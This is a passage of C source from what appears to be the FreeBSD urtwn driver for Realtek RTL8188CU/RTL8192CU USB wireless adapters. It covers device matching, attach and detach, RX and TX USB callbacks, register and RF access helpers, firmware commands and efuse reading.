RTL8192CU), URTWN_DEV(GUILLEMOT, HWNUP150), URTWN_DEV(HAWKING, RTL8192CU), URTWN_DEV(HP3, RTL8188CU), URTWN_DEV(NETGEAR, WNA1000M), URTWN_DEV(NETGEAR, RTL8192CU), URTWN_DEV(NETGEAR4, RTL8188CU), URTWN_DEV(NOVATECH, RTL8188CU), URTWN_DEV(PLANEX2, RTL8188CU_1), URTWN_DEV(PLANEX2, RTL8188CU_2), URTWN_DEV(PLANEX2, RTL8188CU_3), URTWN_DEV(PLANEX2, RTL8188CU_4), URTWN_DEV(PLANEX2, RTL8188CUS), URTWN_DEV(PLANEX2, RTL8192CU), URTWN_DEV(REALTEK, RTL8188CE_0), URTWN_DEV(REALTEK, RTL8188CE_1), URTWN_DEV(REALTEK, RTL8188CTV), URTWN_DEV(REALTEK, RTL8188CU_0), URTWN_DEV(REALTEK, RTL8188CU_1), URTWN_DEV(REALTEK, RTL8188CU_2), URTWN_DEV(REALTEK, RTL8188CU_COMBO), URTWN_DEV(REALTEK, RTL8188CUS), URTWN_DEV(REALTEK, RTL8188RU_1), URTWN_DEV(REALTEK, RTL8188RU_2), URTWN_DEV(REALTEK, RTL8191CU), URTWN_DEV(REALTEK, RTL8192CE), URTWN_DEV(REALTEK, RTL8192CU), URTWN_DEV(REALTEK, RTL8188CU_0), URTWN_DEV(SITECOMEU, RTL8188CU_1), URTWN_DEV(SITECOMEU, RTL8188CU_2), URTWN_DEV(SITECOMEU, RTL8192CU), URTWN_DEV(TRENDNET, RTL8188CU), URTWN_DEV(TRENDNET, RTL8192CU), URTWN_DEV(ZYXEL, RTL8192CU), #undef URTWN_DEV }; static device_probe_t urtwn_match; static device_attach_t urtwn_attach; static device_detach_t urtwn_detach; static usb_callback_t urtwn_bulk_tx_callback; static usb_callback_t urtwn_bulk_rx_callback; static usb_error_t urtwn_do_request(struct urtwn_softc *sc, struct usb_device_request *req, void *data); static struct ieee80211vap *urtwn_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void urtwn_vap_delete(struct ieee80211vap *); static struct mbuf * urtwn_rx_frame(struct urtwn_softc *, uint8_t *, int, int *); static struct mbuf * urtwn_rxeof(struct usb_xfer *, struct urtwn_data *, int *, int8_t *); static void urtwn_txeof(struct usb_xfer *, struct urtwn_data *); static int urtwn_alloc_list(struct urtwn_softc *, struct urtwn_data[], int, int); static int urtwn_alloc_rx_list(struct urtwn_softc *); static int urtwn_alloc_tx_list(struct urtwn_softc *); static void urtwn_free_tx_list(struct urtwn_softc *); static void urtwn_free_rx_list(struct urtwn_softc *); static void urtwn_free_list(struct urtwn_softc *, struct urtwn_data data[], int); static struct urtwn_data * _urtwn_getbuf(struct urtwn_softc *); static struct urtwn_data * urtwn_getbuf(struct urtwn_softc *); static int urtwn_write_region_1(struct urtwn_softc *, uint16_t, uint8_t *, int); static void urtwn_write_1(struct urtwn_softc *, uint16_t, uint8_t); static void urtwn_write_2(struct urtwn_softc *, uint16_t, uint16_t); static void urtwn_write_4(struct urtwn_softc *, uint16_t, uint32_t); static int urtwn_read_region_1(struct urtwn_softc *, uint16_t, uint8_t *, int); static uint8_t urtwn_read_1(struct urtwn_softc *, uint16_t); static uint16_t urtwn_read_2(struct urtwn_softc *, uint16_t); static uint32_t urtwn_read_4(struct urtwn_softc *, uint16_t); static int urtwn_fw_cmd(struct urtwn_softc *, uint8_t, const void *, int); static void urtwn_rf_write(struct urtwn_softc *, int, uint8_t, uint32_t); static uint32_t urtwn_rf_read(struct urtwn_softc *, int, uint8_t); static int urtwn_llt_write(struct urtwn_softc *, uint32_t, uint32_t); static uint8_t urtwn_efuse_read_1(struct urtwn_softc *, uint16_t); static void urtwn_efuse_read(struct urtwn_softc *); static int urtwn_read_chipid(struct urtwn_softc *); static void urtwn_read_rom(struct urtwn_softc *); static int urtwn_ra_init(struct urtwn_softc *); static void urtwn_tsf_sync_enable(struct urtwn_softc *); static void urtwn_set_led(struct urtwn_softc *, int, int); static int urtwn_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void urtwn_watchdog(void *); static void urtwn_update_avgrssi(struct urtwn_softc *, int, int8_t); static int8_t urtwn_get_rssi(struct urtwn_softc *, int, void *); static int urtwn_tx_start(struct urtwn_softc *, struct ieee80211_node *, struct mbuf *, struct urtwn_data *); static void urtwn_start(struct ifnet *); static int urtwn_ioctl(struct ifnet *, u_long, caddr_t); static int urtwn_power_on(struct urtwn_softc *); static int urtwn_llt_init(struct urtwn_softc *); static void urtwn_fw_reset(struct urtwn_softc *); static int urtwn_fw_loadpage(struct urtwn_softc *, int, const uint8_t *, int); static int urtwn_load_firmware(struct urtwn_softc *); static int urtwn_dma_init(struct urtwn_softc *); static void urtwn_mac_init(struct urtwn_softc *); static void urtwn_bb_init(struct urtwn_softc *); static void urtwn_rf_init(struct urtwn_softc *); static void urtwn_cam_init(struct urtwn_softc *); static void urtwn_pa_bias_init(struct urtwn_softc *); static void urtwn_rxfilter_init(struct urtwn_softc *); static void urtwn_edca_init(struct urtwn_softc *); static void urtwn_write_txpower(struct urtwn_softc *, int, uint16_t[]); static void urtwn_get_txpower(struct urtwn_softc *, int, struct ieee80211_channel *, struct ieee80211_channel *, uint16_t[]); static void urtwn_set_txpower(struct urtwn_softc *, struct ieee80211_channel *, struct ieee80211_channel *); static void urtwn_scan_start(struct ieee80211com *); static void urtwn_scan_end(struct ieee80211com *); static void urtwn_set_channel(struct ieee80211com *); static void urtwn_set_chan(struct urtwn_softc *, struct ieee80211_channel *, struct ieee80211_channel *); static void urtwn_update_mcast(struct ifnet *); static void urtwn_iq_calib(struct urtwn_softc *); static void urtwn_lc_calib(struct urtwn_softc *); static void urtwn_init(void *); static void urtwn_init_locked(void *); static void urtwn_stop(struct ifnet *, int); static void urtwn_stop_locked(struct ifnet *, int); static void urtwn_abort_xfers(struct urtwn_softc *); static int urtwn_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); /* Aliases. */ #define urtwn_bb_write urtwn_write_4 #define urtwn_bb_read urtwn_read_4 static const struct usb_config urtwn_config[URTWN_N_TRANSFER] = { [URTWN_BULK_RX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = URTWN_RXBUFSZ, .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = urtwn_bulk_rx_callback, }, [URTWN_BULK_TX_BE] = { .type = UE_BULK, .endpoint = 0x03, .direction = UE_DIR_OUT, .bufsize = URTWN_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = urtwn_bulk_tx_callback, .timeout = URTWN_TX_TIMEOUT, /* ms */ }, [URTWN_BULK_TX_BK] = { .type = UE_BULK, .endpoint = 0x03, .direction = UE_DIR_OUT, .bufsize = URTWN_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1, }, .callback = urtwn_bulk_tx_callback, .timeout = URTWN_TX_TIMEOUT, /* ms */ }, [URTWN_BULK_TX_VI] = { .type = UE_BULK, .endpoint = 0x02, .direction = UE_DIR_OUT, .bufsize = URTWN_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = urtwn_bulk_tx_callback, .timeout = URTWN_TX_TIMEOUT, /* ms */ }, [URTWN_BULK_TX_VO] = { .type = UE_BULK, .endpoint = 0x02, .direction = UE_DIR_OUT, .bufsize = URTWN_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = urtwn_bulk_tx_callback, .timeout = URTWN_TX_TIMEOUT, /* ms */ }, }; static int urtwn_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != URTWN_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != URTWN_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(urtwn_devs, sizeof(urtwn_devs), uaa)); } static int urtwn_attach(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); struct urtwn_softc *sc = device_get_softc(self); struct ifnet *ifp; struct ieee80211com *ic; uint8_t iface_index, bands; int error; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(self), MTX_NETWORK_LOCK, MTX_DEF); callout_init(&sc->sc_watchdog_ch, 0); iface_index = URTWN_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, urtwn_config, URTWN_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(self, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } URTWN_LOCK(sc); error = urtwn_read_chipid(sc); if (error) { device_printf(sc->sc_dev, "unsupported test chip\n"); URTWN_UNLOCK(sc); goto detach; } /* Determine number of Tx/Rx chains. */ if (sc->chip & URTWN_CHIP_92C) { sc->ntxchains = (sc->chip & URTWN_CHIP_92C_1T2R) ? 1 : 2; sc->nrxchains = 2; } else { sc->ntxchains = 1; sc->nrxchains = 1; } urtwn_read_rom(sc); device_printf(sc->sc_dev, "MAC/BB RTL%s, RF 6052 %dT%dR\n", (sc->chip & URTWN_CHIP_92C) ? "8192CU" : (sc->board_type == R92C_BOARD_TYPE_HIGHPA) ? "8188RU" : (sc->board_type == R92C_BOARD_TYPE_MINICARD) ? "8188CE-VAU" : "8188CUS", sc->ntxchains, sc->nrxchains); URTWN_UNLOCK(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "urtwn", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = urtwn_init; ifp->if_ioctl = urtwn_ioctl; ifp->if_start = urtwn_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_raw_xmit = urtwn_raw_xmit; ic->ic_scan_start = urtwn_scan_start; ic->ic_scan_end = urtwn_scan_end; ic->ic_set_channel = urtwn_set_channel; ic->ic_vap_create = urtwn_vap_create; ic->ic_vap_delete = urtwn_vap_delete; ic->ic_update_mcast = urtwn_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), URTWN_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), URTWN_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); detach: urtwn_detach(self); return (ENXIO); /* failure */ } static int urtwn_detach(device_t self) { struct urtwn_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; if (!device_is_attached(self)) return (0); urtwn_stop(ifp, 1); callout_drain(&sc->sc_watchdog_ch); /* stop all USB transfers */ usbd_transfer_unsetup(sc->sc_xfer, URTWN_N_TRANSFER); ieee80211_ifdetach(ic); urtwn_free_tx_list(sc); urtwn_free_rx_list(sc); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static void urtwn_free_tx_list(struct urtwn_softc *sc) { urtwn_free_list(sc, sc->sc_tx, URTWN_TX_LIST_COUNT); } static void urtwn_free_rx_list(struct urtwn_softc *sc) { urtwn_free_list(sc, sc->sc_rx, URTWN_RX_LIST_COUNT); } static void urtwn_free_list(struct urtwn_softc *sc, struct urtwn_data data[], int ndata) { int i; for (i = 0; i < ndata; i++) { struct urtwn_data *dp = &data[i]; if (dp->buf != NULL) { free(dp->buf, M_USBDEV); dp->buf = NULL; } if (dp->ni != NULL) { ieee80211_free_node(dp->ni); dp->ni = NULL; } } } static usb_error_t urtwn_do_request(struct urtwn_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; URTWN_ASSERT_LOCKED(sc); while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); usb_pause_mtx(&sc->sc_mtx, hz / 100); } return (err); } static struct ieee80211vap * urtwn_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct urtwn_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); uvp = (struct urtwn_vap *) malloc(sizeof(struct urtwn_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return (NULL); vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = urtwn_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void urtwn_vap_delete(struct ieee80211vap *vap) { struct urtwn_vap *uvp = URTWN_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static struct mbuf * urtwn_rx_frame(struct urtwn_softc *sc, uint8_t *buf, int pktlen, int *rssi_p) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct mbuf *m; struct r92c_rx_stat *stat; uint32_t rxdw0, rxdw3; uint8_t rate; int8_t rssi = 0; int infosz; /* * don't pass packets to the ieee80211 framework if the driver isn't * RUNNING. */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) return (NULL); stat = (struct r92c_rx_stat *)buf; rxdw0 = le32toh(stat->rxdw0); rxdw3 = le32toh(stat->rxdw3); if (rxdw0 & (R92C_RXDW0_CRCERR | R92C_RXDW0_ICVERR)) { /* * This should not happen since we setup our Rx filter * to not receive these frames. */ ifp->if_ierrors++; return (NULL); } rate = MS(rxdw3, R92C_RXDW3_RATE); infosz = MS(rxdw0, R92C_RXDW0_INFOSZ) * 8; /* Get RSSI from PHY status descriptor if present. */ if (infosz != 0 && (rxdw0 & R92C_RXDW0_PHYST)) { rssi = urtwn_get_rssi(sc, rate, &stat[1]); /* Update our average RSSI. */ urtwn_update_avgrssi(sc, rate, rssi); /* * Convert the RSSI to a range that will be accepted * by net80211. */ rssi = URTWN_RSSI(rssi); } m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { device_printf(sc->sc_dev, "could not create RX mbuf\n"); return (NULL); } /* Finalize mbuf. */ m->m_pkthdr.rcvif = ifp; wh = (struct ieee80211_frame *)((uint8_t *)&stat[1] + infosz); memcpy(mtod(m, uint8_t *), wh, pktlen); m->m_pkthdr.len = m->m_len = pktlen; if (ieee80211_radiotap_active(ic)) { struct urtwn_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; /* Map HW rate index to 802.11 rate. */ if (!(rxdw3 & R92C_RXDW3_HT)) { switch (rate) { /* CCK. */ case 0: tap->wr_rate = 2; break; case 1: tap->wr_rate = 4; break; case 2: tap->wr_rate = 11; break; case 3: tap->wr_rate = 22; break; /* OFDM. */ case 4: tap->wr_rate = 12; break; case 5: tap->wr_rate = 18; break; case 6: tap->wr_rate = 24; break; case 7: tap->wr_rate = 36; break; case 8: tap->wr_rate = 48; break; case 9: tap->wr_rate = 72; break; case 10: tap->wr_rate = 96; break; case 11: tap->wr_rate = 108; break; } } else if (rate >= 12) { /* MCS0~15. */ /* Bit 7 set means HT MCS instead of rate. */ tap->wr_rate = 0x80 | (rate - 12); } tap->wr_dbm_antsignal = rssi; tap->wr_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wr_chan_flags = htole16(ic->ic_curchan->ic_flags); } *rssi_p = rssi; return (m); } static struct mbuf * urtwn_rxeof(struct usb_xfer *xfer, struct urtwn_data *data, int *rssi, int8_t *nf) { struct urtwn_softc *sc = data->sc; struct ifnet *ifp = sc->sc_ifp; struct r92c_rx_stat *stat; struct mbuf *m, *m0 = NULL, *prevm = NULL; uint32_t rxdw0; uint8_t *buf; int len, totlen, pktlen, infosz, npkts; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); if (len < sizeof(*stat)) { ifp->if_ierrors++; return (NULL); } buf = data->buf; /* Get the number of encapsulated frames. */ stat = (struct r92c_rx_stat *)buf; npkts = MS(le32toh(stat->rxdw2), R92C_RXDW2_PKTCNT); DPRINTFN(6, "Rx %d frames in one chunk\n", npkts); /* Process all of them. */ while (npkts-- > 0) { if (len < sizeof(*stat)) break; stat = (struct r92c_rx_stat *)buf; rxdw0 = le32toh(stat->rxdw0); pktlen = MS(rxdw0, R92C_RXDW0_PKTLEN); if (pktlen == 0) break; infosz = MS(rxdw0, R92C_RXDW0_INFOSZ) * 8; /* Make sure everything fits in xfer. */ totlen = sizeof(*stat) + infosz + pktlen; if (totlen > len) break; m = urtwn_rx_frame(sc, buf, pktlen, rssi); if (m0 == NULL) m0 = m; if (prevm == NULL) prevm = m; else { prevm->m_next = m; prevm = m; } /* Next chunk is 128-byte aligned. */ totlen = (totlen + 127) & ~127; buf += totlen; len -= totlen; } return (m0); } static void urtwn_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtwn_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL, *next; struct urtwn_data *data; int8_t nf; int rssi = 1; URTWN_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto tr_setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); m = urtwn_rxeof(xfer, data, &rssi, &nf); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) { KASSERT(m == NULL, ("mbuf isn't NULL")); return; } STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. */ URTWN_UNLOCK(sc); while (m != NULL) { next = m->m_next; m->m_next = NULL; wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); nf = URTWN_NOISE_FLOOR; if (ni != NULL) { (void)ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi, nf); m = next; } URTWN_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. */ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto tr_setup; } break; } } static void urtwn_txeof(struct usb_xfer *xfer, struct urtwn_data *data) { struct urtwn_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; URTWN_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB) { /* XXX status? */ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { ieee80211_free_node(data->ni); data->ni = NULL; } sc->sc_txtimer = 0; ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void urtwn_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtwn_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct urtwn_data *data; URTWN_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)){ case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto tr_setup; STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); urtwn_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF("%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); usbd_transfer_submit(xfer); URTWN_UNLOCK(sc); urtwn_start(ifp); URTWN_LOCK(sc); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto tr_setup; if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static struct urtwn_data * _urtwn_getbuf(struct urtwn_softc *sc) { struct urtwn_data *bf; bf = STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); else bf = NULL; if (bf == NULL) DPRINTF("%s: %s\n", __func__, "out of xmit buffers"); return (bf); } static struct urtwn_data * urtwn_getbuf(struct urtwn_softc *sc) { struct urtwn_data *bf; URTWN_ASSERT_LOCKED(sc); bf = _urtwn_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF("%s: stop queue\n", __func__); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static int urtwn_write_region_1(struct urtwn_softc *sc, uint16_t addr, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = R92C_REQ_REGS; USETW(req.wValue, addr); USETW(req.wIndex, 0); USETW(req.wLength, len); return (urtwn_do_request(sc, &req, buf)); } static void urtwn_write_1(struct urtwn_softc *sc, uint16_t addr, uint8_t val) { urtwn_write_region_1(sc, addr, &val, 1); } static void urtwn_write_2(struct urtwn_softc *sc, uint16_t addr, uint16_t val) { val = htole16(val); urtwn_write_region_1(sc, addr, (uint8_t *)&val, 2); } static void urtwn_write_4(struct urtwn_softc *sc, uint16_t addr, uint32_t val) { val = htole32(val); urtwn_write_region_1(sc, addr, (uint8_t *)&val, 4); } static int urtwn_read_region_1(struct urtwn_softc *sc, uint16_t addr, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = R92C_REQ_REGS; USETW(req.wValue, addr); USETW(req.wIndex, 0); USETW(req.wLength, len); return (urtwn_do_request(sc, &req, buf)); } static uint8_t urtwn_read_1(struct urtwn_softc *sc, uint16_t addr) { uint8_t val; if (urtwn_read_region_1(sc, addr, &val, 1) != 0) return (0xff); return (val); } static uint16_t urtwn_read_2(struct urtwn_softc *sc, uint16_t addr) { uint16_t val; if (urtwn_read_region_1(sc, addr, (uint8_t *)&val, 2) != 0) return (0xffff); return (le16toh(val)); } static uint32_t urtwn_read_4(struct urtwn_softc *sc, uint16_t addr) { uint32_t val; if (urtwn_read_region_1(sc, addr, (uint8_t *)&val, 4) != 0) return (0xffffffff); return (le32toh(val)); } static int urtwn_fw_cmd(struct urtwn_softc *sc, uint8_t id, const void *buf, int len) { struct r92c_fw_cmd cmd; int ntries; /* Wait for current FW box to be empty. */ for (ntries = 0; ntries < 100; ntries++) { if (!(urtwn_read_1(sc, R92C_HMETFR) & (1 << sc->fwcur))) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not send firmware command\n"); return (ETIMEDOUT); } memset(&cmd, 0, sizeof(cmd)); cmd.id = id; if (len > 3) cmd.id |= R92C_CMD_FLAG_EXT; KASSERT(len <= sizeof(cmd.msg), ("urtwn_fw_cmd\n")); memcpy(cmd.msg, buf, len); /* Write the first word last since that will trigger the FW. */ urtwn_write_region_1(sc, R92C_HMEBOX_EXT(sc->fwcur), (uint8_t *)&cmd + 4, 2); urtwn_write_region_1(sc, R92C_HMEBOX(sc->fwcur), (uint8_t *)&cmd + 0, 4); sc->fwcur = (sc->fwcur + 1) % R92C_H2C_NBOX; return (0); } static void urtwn_rf_write(struct urtwn_softc *sc, int chain, uint8_t addr, uint32_t val) { urtwn_bb_write(sc, R92C_LSSI_PARAM(chain), SM(R92C_LSSI_PARAM_ADDR, addr) | SM(R92C_LSSI_PARAM_DATA, val)); } static uint32_t urtwn_rf_read(struct urtwn_softc *sc, int chain, uint8_t addr) { uint32_t reg[R92C_MAX_CHAINS], val; reg[0] = urtwn_bb_read(sc, R92C_HSSI_PARAM2(0)); if (chain != 0) reg[chain] = urtwn_bb_read(sc, R92C_HSSI_PARAM2(chain)); urtwn_bb_write(sc, R92C_HSSI_PARAM2(0), reg[0] & ~R92C_HSSI_PARAM2_READ_EDGE); DELAY(1000); urtwn_bb_write(sc, R92C_HSSI_PARAM2(chain), RW(reg[chain], R92C_HSSI_PARAM2_READ_ADDR, addr) | R92C_HSSI_PARAM2_READ_EDGE); DELAY(1000); urtwn_bb_write(sc, R92C_HSSI_PARAM2(0), reg[0] | R92C_HSSI_PARAM2_READ_EDGE); DELAY(1000); if (urtwn_bb_read(sc, R92C_HSSI_PARAM1(chain)) & R92C_HSSI_PARAM1_PI) val = urtwn_bb_read(sc, R92C_HSPI_READBACK(chain)); else val = urtwn_bb_read(sc, R92C_LSSI_READBACK(chain)); return (MS(val, R92C_LSSI_READBACK_DATA)); } static int urtwn_llt_write(struct urtwn_softc *sc, uint32_t addr, uint32_t data) { int ntries; urtwn_write_4(sc, R92C_LLT_INIT, SM(R92C_LLT_INIT_OP, R92C_LLT_INIT_OP_WRITE) | SM(R92C_LLT_INIT_ADDR, addr) | SM(R92C_LLT_INIT_DATA, data)); /* Wait for write operation to complete. */ for (ntries = 0; ntries < 20; ntries++) { if (MS(urtwn_read_4(sc, R92C_LLT_INIT), R92C_LLT_INIT_OP) == R92C_LLT_INIT_OP_NO_ACTIVE) return (0); DELAY(5); } return (ETIMEDOUT); } static uint8_t urtwn_efuse_read_1(struct urtwn_softc *sc, uint16_t addr) { uint32_t reg; int ntries; reg = urtwn_read_4(sc, R92C_EFUSE_CTRL); reg = RW(reg, R92C_EFUSE_CTRL_ADDR, addr); reg &= ~R92C_EFUSE_CTRL_VALID; urtwn_write_4(sc, R92C_EFUSE_CTRL, reg); /* Wait for read operation to complete. */ for (ntries = 0; ntries < 100; ntries++) { reg = urtwn_read_4(sc, R92C_EFUSE_CTRL); if (reg & R92C_EFUSE_CTRL_VALID) return (MS(reg, R92C_EFUSE_CTRL_DATA)); DELAY(5); } device_printf(sc->sc_dev, "could not read efuse byte at address 0x%x\n", addr); return (0xff); } static void urtwn_efuse_read(struct urtwn_softc *sc) { uint8_t *rom = (uint8_t *)&sc->rom; uint16_t addr = 0; uint32_t reg; uint8_t off, msk; int i; reg = urtwn_read_2(sc, R92C_SYS_ISO_CTRL); if (!(reg & R92C_SYS_ISO_CTRL_PWC_EV12V)) { urtwn_write_2(sc, R92C_SYS_ISO_CTRL, reg | R92C_SYS_ISO_CTRL_PWC_EV12V); } reg = urtwn_read_2(sc, R92C_SYS_FUNC_EN); if (!(reg & R92C_SYS_FUNC_EN_ELDR)) { urtwn_write_2(sc, R92C_SYS_FUNC_EN, reg | R92C_SYS_FUNC_EN_ELDR); } reg = urtwn_read_2(sc, R92C_SYS_CLKR); if ((reg & (R92C_SYS_CLKR_LOADER_EN | R92C_SYS_CLKR_ANA8M)) != (R92C_SYS_CLKR_LOADER_EN | R92C_SYS_CLKR_ANA8M)) { urtwn_write_2(sc, R92C_SYS_CLKR, reg | R92C_SYS_CLKR_LOADER_EN | R92C_SYS_CLKR_ANA8M); } memset(&sc->rom, 0xff, sizeof(sc->rom)); while (addr < 512) { reg = urtwn_efuse_read_1(sc, addr); if (reg == 0xff) break; addr++; off = reg >> 4; msk = reg & 0xf; for (i = 0; i < 4; i++) { if (msk & (1 << i)) continue; rom[off * 8 + i * 2 + 0] = urtwn_efuse_read_1(sc, addr); addr++; rom[off * 8 + i * 2 + 1] = urtwn_efuse_read_1(sc, addr); addr++; } } #ifdef URTWN_DEBUG if (urtwn_debug >= 2) { /* Dump 